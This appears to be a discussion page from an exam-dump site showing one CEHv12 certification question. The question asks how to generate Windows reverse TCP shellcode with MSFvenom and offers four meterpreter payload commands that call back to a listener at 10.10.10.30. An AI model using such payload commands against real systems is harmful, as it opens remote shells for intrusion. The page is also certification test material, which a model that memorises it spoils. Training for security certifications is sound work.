ECCouncil Certified Ethical Hacker Exam (CEHv12) 312-50v12 Question # 38 Topic 4 Discussion

ECCouncil Certified Ethical Hacker Exam (CEHv12) 312-50v12 Question # 38 Topic 4 Discussion

312-50v12 Exam Topic 4 Question 38 Discussion:
Question #: 38
Topic #: 4

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?


A.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c


B.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c


C.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe


D.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe


Get Premium 312-50v12 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.